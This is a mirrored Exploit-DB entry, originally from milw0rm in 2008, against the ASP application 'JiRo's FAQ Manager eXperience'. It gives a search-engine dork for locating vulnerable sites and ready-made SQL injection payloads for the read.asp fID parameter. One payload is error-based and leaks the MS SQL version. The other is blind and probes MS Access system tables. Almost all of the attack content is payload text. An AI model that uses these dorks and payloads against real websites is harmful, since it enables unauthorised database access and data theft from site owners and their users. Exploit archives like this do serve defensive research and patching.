exploit-db-mirror/exploits/asp/webapps/5753.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

25 lines
No EOL
1,003 B
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[+] Script Name : JiRo´s FAQ Manager eXperience
[+] Version : v 1.0
[+] Price : _ Single Website License 34.95 $
_ 2 Websites License 62.95 $
_ 5 Websites License 139.95 $
[+] Author : Underz0ne Crew
[+] Home : http://www.underz0ne.net
[+] Script In short : ('JiRos FAQ Management System is an essential
element for any webmaster, providing your customers with answers to
specific questions on-line 24 hours a day, 7 days a week. Build a
complete knowledge base, adding articles and creating your own topic
based FAQ system using our feature packed administration facility ')
[+] Dork : inurl:"read.asp?fID="
--//--> Exploit :
read.asp?fID={SQL}
__--> MS SQL Server : convert(int,(select+@@version));
__--> MS Access : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'Bingo')%00
--//-->
# milw0rm.com [2008-06-08]